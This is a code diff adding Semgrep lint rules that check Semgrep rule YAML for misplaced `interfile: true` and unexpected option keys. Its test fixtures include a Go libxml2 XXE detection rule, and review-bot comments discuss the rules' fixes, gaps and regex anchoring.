+ severity: ERROR + # ruleid: interfile-true-under-metadata-and-no-options + metadata: + likelihood: MEDIUM + impact: HIGH + confidence: HIGH + interfile: true + category: security + subcategory: + - vuln + cwe: + - 'CWE-611: Improper Restriction of XML External Entity Reference' + cwe2020-top25: true + cwe2021-top25: true + cwe2022-top25: true + owasp: + - A04:2017 - XML External Entities (XXE) + - A05:2021 - Security Misconfiguration + references: + - https://owasp.org/Top10/A05_2021-Security_Misconfiguration + technology: + - go + - libxml2 + - go + - go-net/http + - gin + - gin-gonic/gin + languages: + - go + mode: taint + pattern-sources: + - patterns: + - pattern-either: + - pattern: | + ($REQ : http.Request).$FIELD + - pattern: | + ($REQ : *http.Request).$FIELD + - metavariable-regex: + metavariable: $FIELD + regex: + ^(BasicAuth|Body|Cookie|Cookies|Form|FormValue|GetBody|Host|Header|MultipartReader|ParseForm|ParseMultipartForm|PostForm|PostFormValue|Referer|RequestURI|Trailer|TransferEncoding|URL|UserAgent)$ + - patterns: + - pattern-inside: | + import "github.com/gin-gonic/gin" + ... + - pattern-either: + - patterns: + - pattern-either: + - pattern: | + ($CONTEXT : gin.Context).$FIELD + - pattern: | + ($CONTEXT : *gin.Context).$FIELD + - metavariable-regex: + metavariable: $FIELD + regex: + ^(Cookie|DefaultPostForm|DefaultQuery|FormFile|GetHeader|GetPostForm|GetPostFormArray|GetPostFormMap|GetQuery|GetQueryArray|GetQueryMap|GetRawData|MultipartForm|Param|Params|PostForm|PostFormArray|PostFormMap|Query|QueryArray|QueryMap)$ + - pattern-either: + - pattern: | + ($CONTEXT : gin.Context).Request.URL.Query().Get(...) + - pattern: | + ($CONTEXT : *gin.Context).Request.URL.Query().Get(...) + pattern-sinks: + - patterns: + - patterns: + - pattern-inside: | + import "$IMPORT" + ... + - metavariable-regex: + metavariable: $IMPORT + regex: (.*lestrrat-go/libxml2.*) + - patterns: + - pattern-either: + - patterns: + - pattern-inside: | + $P = parser.New($OPTS) + ... 
+          - pattern: |
+              $P.$PARSE($INPUT)
+        - pattern: |
+            parser.New($OPTS).$PARSE($INPUT)
+        - pattern: |
+            NewCtxt($INPUT, $OPTS)
+      - focus-metavariable: $INPUT
+      - metavariable-regex:
+          metavariable: $PARSE
+          regex: ^(Parse|ParseHTML|ParseHTMLReader|ParseHTMLString|ParseReader|ParseString)$
+      - metavariable-pattern:
+          metavariable: $OPTS
+          patterns:
+          - pattern-either:
+            - pattern: |
+                XMLParseNoEnt
+            - pattern: |
+                parser.XMLParseNoEnt
+
diff --git a/yaml/semgrep/interfile-true-under-metadata-and-no-options.yaml b/yaml/semgrep/interfile-true-under-metadata-and-no-options.yaml
new file mode 100644
index 0000000000..fc87f97cec
--- /dev/null
+++ b/yaml/semgrep/interfile-true-under-metadata-and-no-options.yaml
@@ -0,0 +1,35 @@
+rules:
+  - id: interfile-true-under-metadata-and-no-options
+    message: "`interfile: true` should be under the `options` field, not the
+      `metadata` field."
+    languages:
+      - yaml
+    severity: WARNING
+    patterns:
+      - pattern: |
+          rules:
+            - id: $ID
+              ...
+              $METADATA:
+                ...
+                $INTERFILE: true
+                ...
+              ...
+      - pattern-not-inside: |
+          rules:
+            - id: $ID
+              ...
+              options:
+                ...
+              ...
+      - metavariable-regex:
+          metavariable: $INTERFILE
+          regex: interfile
+      - metavariable-regex:
+          metavariable: $METADATA
+          regex: metadata
+      - focus-metavariable: $METADATA
+    fix: |
+      options:
+        interfile: true
+      metadata
diff --git a/yaml/semgrep/interfile-true-under-metadata-and-options-already-present.fixed.test.yaml b/yaml/semgrep/interfile-true-under-metadata-and-options-already-present.fixed.test.yaml
new file mode 100644
index 0000000000..e46ab60f60
--- /dev/null
+++ b/yaml/semgrep/interfile-true-under-metadata-and-options-already-present.fixed.test.yaml
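Review bot: The message says `interfile: true` should be under `options`, "not the `metadata` field", but the `fix:` only inserts the `options` block and leaves `metadata.interfile` in place — the `.fixed.test.yaml` on this page keeps both. Either the message should say the `options` entry is required in addition (plausible if the registry still reads `metadata.interfile`), or the fix should drop the metadata entry; the sibling rule interfile-true-under-metadata-and-options-already-present.yaml has the same mismatch. The multi-line `fix:` text is substituted at the focused `metadata` key, so its own indentation (`interfile: true` two spaces under `options:`) lines up only when the rule's keys sit where the fix assumes; unless semgrep re-indents multi-line fixes, which I have not verified, a rule written as `  - id:` with four-space keys would come out mis-indented, and a second test fixture in that layout would settle it.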
@@ -0,0 +1,112 @@ +rules: +- id: libxml2-xxe-taint + message: >- + The application is using an XML parser that has not been safely configured. This might lead to XML + External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include + document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead + to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side + request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs + to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs + Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting + the use of external entities from the start can prevent the parser from being used to process untrusted + XML files. Reducing dependencies on external resources is also a good practice for performance reasons. + It is difficult to guarantee that even a trusted XML file on your server or during transmission has + not been tampered with by a malicious third-party. 
+ severity: ERROR + options: + # ruleid: interfile-true-under-metadata-and-options-already-present + symbolic_propagation: true + interfile: true + metadata: + likelihood: MEDIUM + impact: HIGH + confidence: HIGH + interfile: true + category: security + subcategory: + - vuln + cwe: + - 'CWE-611: Improper Restriction of XML External Entity Reference' + cwe2020-top25: true + cwe2021-top25: true + cwe2022-top25: true + owasp: + - A04:2017 - XML External Entities (XXE) + - A05:2021 - Security Misconfiguration + references: + - https://owasp.org/Top10/A05_2021-Security_Misconfiguration + technology: + - go + - libxml2 + - go + - go-net/http + - gin + - gin-gonic/gin + languages: + - go + mode: taint + pattern-sources: + - patterns: + - pattern-either: + - pattern: | + ($REQ : http.Request).$FIELD + - pattern: | + ($REQ : *http.Request).$FIELD + - metavariable-regex: + metavariable: $FIELD + regex: + ^(BasicAuth|Body|Cookie|Cookies|Form|FormValue|GetBody|Host|Header|MultipartReader|ParseForm|ParseMultipartForm|PostForm|PostFormValue|Referer|RequestURI|Trailer|TransferEncoding|URL|UserAgent)$ + - patterns: + - pattern-inside: | + import "github.com/gin-gonic/gin" + ... + - pattern-either: + - patterns: + - pattern-either: + - pattern: | + ($CONTEXT : gin.Context).$FIELD + - pattern: | + ($CONTEXT : *gin.Context).$FIELD + - metavariable-regex: + metavariable: $FIELD + regex: + ^(Cookie|DefaultPostForm|DefaultQuery|FormFile|GetHeader|GetPostForm|GetPostFormArray|GetPostFormMap|GetQuery|GetQueryArray|GetQueryMap|GetRawData|MultipartForm|Param|Params|PostForm|PostFormArray|PostFormMap|Query|QueryArray|QueryMap)$ + - pattern-either: + - pattern: | + ($CONTEXT : gin.Context).Request.URL.Query().Get(...) + - pattern: | + ($CONTEXT : *gin.Context).Request.URL.Query().Get(...) + pattern-sinks: + - patterns: + - patterns: + - pattern-inside: | + import "$IMPORT" + ... 
+ - metavariable-regex: + metavariable: $IMPORT + regex: (.*lestrrat-go/libxml2.*) + - patterns: + - pattern-either: + - patterns: + - pattern-inside: | + $P = parser.New($OPTS) + ... + - pattern: | + $P.$PARSE($INPUT) + - pattern: | + parser.New($OPTS).$PARSE($INPUT) + - pattern: | + NewCtxt($INPUT, $OPTS) + - focus-metavariable: $INPUT + - metavariable-regex: + metavariable: $PARSE + regex: ^(Parse|ParseHTML|ParseHTMLReader|ParseHTMLString|ParseReader|ParseString)$ + - metavariable-pattern: + metavariable: $OPTS + patterns: + - pattern-either: + - pattern: | + XMLParseNoEnt + - pattern: | + parser.XMLParseNoEnt + diff --git a/yaml/semgrep/interfile-true-under-metadata-and-options-already-present.test.yaml b/yaml/semgrep/interfile-true-under-metadata-and-options-already-present.test.yaml new file mode 100644 index 0000000000..d5900f6375 --- /dev/null +++ b/yaml/semgrep/interfile-true-under-metadata-and-options-already-present.test.yaml 
@@ -0,0 +1,111 @@ +rules: +- id: libxml2-xxe-taint + message: >- + The application is using an XML parser that has not been safely configured. This might lead to XML + External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include + document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead + to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side + request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs + to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs + Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting + the use of external entities from the start can prevent the parser from being used to process untrusted + XML files. Reducing dependencies on external resources is also a good practice for performance reasons. + It is difficult to guarantee that even a trusted XML file on your server or during transmission has + not been tampered with by a malicious third-party. 
+ severity: ERROR + options: + # ruleid: interfile-true-under-metadata-and-options-already-present + symbolic_propagation: true + metadata: + likelihood: MEDIUM + impact: HIGH + confidence: HIGH + interfile: true + category: security + subcategory: + - vuln + cwe: + - 'CWE-611: Improper Restriction of XML External Entity Reference' + cwe2020-top25: true + cwe2021-top25: true + cwe2022-top25: true + owasp: + - A04:2017 - XML External Entities (XXE) + - A05:2021 - Security Misconfiguration + references: + - https://owasp.org/Top10/A05_2021-Security_Misconfiguration + technology: + - go + - libxml2 + - go + - go-net/http + - gin + - gin-gonic/gin + languages: + - go + mode: taint + pattern-sources: + - patterns: + - pattern-either: + - pattern: | + ($REQ : http.Request).$FIELD + - pattern: | + ($REQ : *http.Request).$FIELD + - metavariable-regex: + metavariable: $FIELD + regex: + ^(BasicAuth|Body|Cookie|Cookies|Form|FormValue|GetBody|Host|Header|MultipartReader|ParseForm|ParseMultipartForm|PostForm|PostFormValue|Referer|RequestURI|Trailer|TransferEncoding|URL|UserAgent)$ + - patterns: + - pattern-inside: | + import "github.com/gin-gonic/gin" + ... + - pattern-either: + - patterns: + - pattern-either: + - pattern: | + ($CONTEXT : gin.Context).$FIELD + - pattern: | + ($CONTEXT : *gin.Context).$FIELD + - metavariable-regex: + metavariable: $FIELD + regex: + ^(Cookie|DefaultPostForm|DefaultQuery|FormFile|GetHeader|GetPostForm|GetPostFormArray|GetPostFormMap|GetQuery|GetQueryArray|GetQueryMap|GetRawData|MultipartForm|Param|Params|PostForm|PostFormArray|PostFormMap|Query|QueryArray|QueryMap)$ + - pattern-either: + - pattern: | + ($CONTEXT : gin.Context).Request.URL.Query().Get(...) + - pattern: | + ($CONTEXT : *gin.Context).Request.URL.Query().Get(...) + pattern-sinks: + - patterns: + - patterns: + - pattern-inside: | + import "$IMPORT" + ... 
+      - metavariable-regex:
+          metavariable: $IMPORT
+          regex: (.*lestrrat-go/libxml2.*)
+    - patterns:
+      - pattern-either:
+        - patterns:
+          - pattern-inside: |
+              $P = parser.New($OPTS)
+              ...
+          - pattern: |
+              $P.$PARSE($INPUT)
+        - pattern: |
+            parser.New($OPTS).$PARSE($INPUT)
+        - pattern: |
+            NewCtxt($INPUT, $OPTS)
+      - focus-metavariable: $INPUT
+      - metavariable-regex:
+          metavariable: $PARSE
+          regex: ^(Parse|ParseHTML|ParseHTMLReader|ParseHTMLString|ParseReader|ParseString)$
+      - metavariable-pattern:
+          metavariable: $OPTS
+          patterns:
+          - pattern-either:
+            - pattern: |
+                XMLParseNoEnt
+            - pattern: |
+                parser.XMLParseNoEnt
+
diff --git a/yaml/semgrep/interfile-true-under-metadata-and-options-already-present.yaml b/yaml/semgrep/interfile-true-under-metadata-and-options-already-present.yaml
new file mode 100644
index 0000000000..c65a7a35a7
--- /dev/null
+++ b/yaml/semgrep/interfile-true-under-metadata-and-options-already-present.yaml
@@ -0,0 +1,46 @@
+rules:
+  - id: interfile-true-under-metadata-and-options-already-present
+    message: >-
+      `interfile: true` should be under the `options` field, not the `metadata` field.
+    languages: [yaml]
+    severity: WARNING
+    patterns:
+      - pattern: |
+          rules:
+            - id: $ID
+              ...
+              $METADATA:
+                ...
+                $INTERFILE: true
+                ...
+              ...
+      - pattern-inside: |
+          rules:
+            - id: $ID
+              ...
+              $OPTIONS:
+                $FIRST_OPT: $VAL
+                ...
+              ...
+      - pattern-not-inside: |
+          rules:
+            - id: $ID
+              ...
+              $OPTIONS:
+                ...
+                interfile: true
+                ...
+              ...
+      - metavariable-regex:
+          metavariable: $INTERFILE
+          regex: interfile
+      - metavariable-regex:
+          metavariable: $METADATA
+          regex: metadata
+      - metavariable-regex:
+          metavariable: $OPTIONS
+          regex: options
+      - focus-metavariable: $VAL
+    fix: |
+      $VAL
+      interfile: true
diff --git a/yaml/semgrep/metadata-incorrect-option.test.yaml b/yaml/semgrep/metadata-incorrect-option.test.yaml
new file mode 100644
index 0000000000..1870c8fcc6
--- /dev/null
+++ b/yaml/semgrep/metadata-incorrect-option.test.yaml
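Review bot: A rule with an empty `options:` mapping (`options: {}` or a bare key) slips through both lints: this one needs a `$FIRST_OPT: $VAL` entry to anchor the fix, and interfile-true-under-metadata-and-no-options.yaml excludes any rule whose `options` key exists at all. Either handle the empty block here or record the gap in a comment above `pattern-inside`, e.g. `# an empty options: block is not handled; see the no-options sibling rule`. The `metavariable-regex` values `interfile`, `metadata` and `options` are unanchored; `^interfile$` and friends avoid matching keys that merely contain those words, though nothing on this page shows such keys.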
@@ -0,0 +1,37 @@
+rules:
+ - id: swift-user-defaults
+ message: Potentially sensitive data was observed to be stored in UserDefaults,
+ which is not adequate protection of sensitive information. For data of a
+ sensitive nature, applications should leverage the Keychain.
+ severity: WARNING
+ metadata:
+ likelihood: LOW
+ impact: HIGH
+ confidence: MEDIUM
+ category: security
+ cwe:
+ - "CWE-311: Missing Encryption of Sensitive Data"
+ masvs:
+ - "MASVS-STORAGE-1: The app securely stores sensitive data"
+ owasp:
+ - A03:2017 - Sensitive Data Exposure
+ - A04:2021 - Insecure Design
+ references:
+ - https://developer.apple.com/library/archive/documentation/Security/Conceptual/SecureCodingGuide/Articles/ValidatingInput.html
+ - https://mas.owasp.org/MASVS/controls/MASVS-STORAGE-1/
+ subcategory:
+ - vuln
+ technology:
+ - ios
+ - macos
+ license: Commons Clause License Condition v1.0[LGPL-2.1-only]
+ vulnerability_class:
+ - Cryptographic Issues
+ languages:
+ - swift
+ options:
+ # ruleid: metadata-incorrect-option
+ taint_propagation: true
+ # ruleid: metadata-incorrect-option
+ value: 2
+ patterns:
\ No newline at end of file
diff --git a/yaml/semgrep/metadata-incorrect-option.yaml b/yaml/semgrep/metadata-incorrect-option.yaml
new file mode 100644
index 0000000000..91609afdf8
--- /dev/null
+++ b/yaml/semgrep/metadata-incorrect-option.yaml
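Review bot: The fixture only contains `# ruleid:` cases (`taint_propagation: true` and `value: 2`), so it never checks that a key which is in the allow-list stays silent, and an over-matching regex in the rule would still pass `semgrep --test`. Add at least one negative case under `options:`, e.g. `# ok: metadata-incorrect-option` above `symbolic_propagation: true`, and ideally a second one for an allowed key that is a prefix of a longer name, since the rule's regex is a bare negative lookahead. The `patterns:` key at the end of the fixture is left without a value; that is fine for a target file but worth a trailing newline so the next edit does not show up as a whole-line change.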
@@ -0,0 +1,25 @@
+rules:
+ - id: metadata-incorrect-option
+ message: >-
+ It looks like $KEY is not in the default list of expected options, if this is a new key update this rule
+ languages:
+ - yaml
+ severity: INFO
+ metadata:
+ references:
+ - https://semgrep.dev/docs/contributing/contributing-to-semgrep-rules-repository
+ category: correctness
+ technology:
+ - semgrep
+ patterns:
+ - pattern-inside: |
+ rules: ...
+ - pattern-inside: |
+ options:
+ $A
+ - focus-metavariable: $A
+ - pattern: |
+ $KEY: $VALUE
+ - metavariable-regex:
+ metavariable: $KEY
+ regex: (?!options|constant_propagation|symbolic_propagation|taint_unify_mvars|taint_assume_safe_functions|taint_assume_safe_indexes|taint_assume_safe_comparisons|taint_assume_safe_booleans|taint_assume_safe_numbers|ac_matching|commutative_boolop|flddef_assign|arrow_is_function|let_is_var|go_deeper_expr|go_deeper_stmt|implicit_deep_exprstmt|implicit_ellipsis|xml_singleton_loose_matching|xml_attrs_implicit_ellipsis|xml_children_ordered|generic_engine|generic_multiline|generic_braces|generic_extra_braces|generic_extra_word_characters|generic_caseless|generic_ellipsis_max_span|generic_comment_style|interfile|generic_engine)
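Review bot: The allow-list regex on the last line is a bare negative lookahead with no `^` and no `$` inside the lookahead, which is fragile in both directions: if metavariable-regex is matched as a substring, the lookahead can succeed at offset 1 of an allowed key (e.g. `ptions` is not in the list) and every option would be reported, and even when anchored at the start, an allowed name used as a prefix of a longer key (`constant_propagation_x`) would be silently accepted. Keeping the same alternation, the intended exact-match form is `regex: ^(?!(options|…|generic_engine)$).+`, and `generic_engine` appears twice in the list and can be listed once. The sibling rule in the same commit uses `^(...)$` for its allow-lists, so this would also bring the two files in line.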
